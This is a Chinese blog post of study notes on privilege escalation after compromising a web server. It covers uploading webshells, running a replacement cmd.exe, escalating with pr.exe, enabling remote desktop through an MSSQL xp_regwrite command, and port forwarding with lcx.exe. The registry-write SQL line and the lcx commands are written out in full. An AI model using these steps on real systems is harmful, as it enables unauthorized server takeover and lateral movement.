某教程学习笔记(一):20、权限提升

简介: 某教程学习笔记(一):20、权限提升

一、一般脚本所处的权限


1、asp/php 匿名权限


2、aspx user权限


3、jsp 系统权限


二、不同脚本,权限也不同


1、上传普通一句话木马,然后用菜刀连接

0a2653c851af460fa595bd959398a8f1.png

2、进入终端,输入命令

0eacb84100b54626af849e6b562bf92a.png

3、我们上传一个大马,访问

2d65d23f6d4748949b924e4057485923.png

4、输入命令,可以正常执行

2e9b90b2ca334476abebe75bafe6eeaa.png

三、cmd无法执行


1、上传一个大马,访问

0a2653c851af460fa595bd959398a8f1.png

2、进入cmd命令界面,发现不能执行

0eacb84100b54626af849e6b562bf92a.png

3、找一个可读写目录,上传本地的cmd.exe

2d65d23f6d4748949b924e4057485923.png

4、把路径修改为我们上传的路径,执行命令

2e9b90b2ca334476abebe75bafe6eeaa.png

四、PR提权


一、执行whoami获取权限

0a2653c851af460fa595bd959398a8f1.png

二、上传pr.exe,重新获取权限,直接就是system权限

0eacb84100b54626af849e6b562bf92a.png

五、MSSQL提权


1、打开sqltools,输入ip、端口、用户名、密码、数据库名,然后点击连接,提示连接成功

2d65d23f6d4748949b924e4057485923.png

2、dos命令可以成功执行

2e9b90b2ca334476abebe75bafe6eeaa.png

3、连接3389提示错误

4cebaac233b3433da32a72337a77fc60.png

4、执行下面命令,打开3389


exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,‘SYSTEM\CurrentControlSet\Control\Terminal Server’,‘fDenyTSConnections’,‘REG_DWORD’,0;–


5、继续连接3389端口

0a2653c851af460fa595bd959398a8f1.png

内网


六、端口转发


1、将lcx.exe上传到服务器,运行


lcx.exe -slave 192.168.171.128(外网) 2222 127.0.0.1(内网) 3389

0eacb84100b54626af849e6b562bf92a.png

2、在本地运行


lcx.exe -listen 1111 2222

2d65d23f6d4748949b924e4057485923.png

3、打开远程桌面连接,输入127.0.0.1:2222,成功连接

2e9b90b2ca334476abebe75bafe6eeaa.png

禁止非法,后果自负


目录
相关文章
|
6月前
|
存储 Unix Linux
Linux指令&权限知识点总结(1)
Linux指令&权限知识点总结(1)
60 2
|
6月前
|
Linux Shell 数据安全/隐私保护
【Linux】基础学习篇三:用户与权限(持续更新)
【Linux】基础学习篇三:用户与权限(持续更新)
|
6月前
|
Linux Shell
Linux指令&权限知识点总结(2)
Linux指令&权限知识点总结(2)
46 0
|
11月前
|
存储 安全 机器人
Harbor2.2 用户角色权限速查
Harbor2.2 用户角色权限速查
244 0
|
弹性计算 Linux Shell
Linux指令入门-文件与权限
本教程介绍Linux系统中常用的文件目录管理和文件权限管理命令。
|
存储 Linux 数据安全/隐私保护
【Linux取经路】权限管理——还在因为没有权限而头疼?手把手教你修改权限(一)
【Linux取经路】权限管理——还在因为没有权限而头疼?手把手教你修改权限(一)
161 0
|
Linux 数据安全/隐私保护
【Linux取经路】权限管理——还在因为没有权限而头疼?手把手教你修改权限(二)
【Linux取经路】权限管理——还在因为没有权限而头疼?手把手教你修改权限(二)
148 0
|
JavaScript 前端开发 API
权限开发(demo使用教程)
权限开发(demo使用教程)
125 0
|
安全 Linux Shell
【Linux技术专题系列】「必备基础知识」一起探索(用户、用户组与文件权限)
【Linux技术专题系列】「必备基础知识」一起探索(用户、用户组与文件权限)
149 0
【Linux技术专题系列】「必备基础知识」一起探索(用户、用户组与文件权限)
|
安全 Java 数据安全/隐私保护
案例之权限相关测试|学习笔记
快速学习案例之权限相关测试
案例之权限相关测试|学习笔记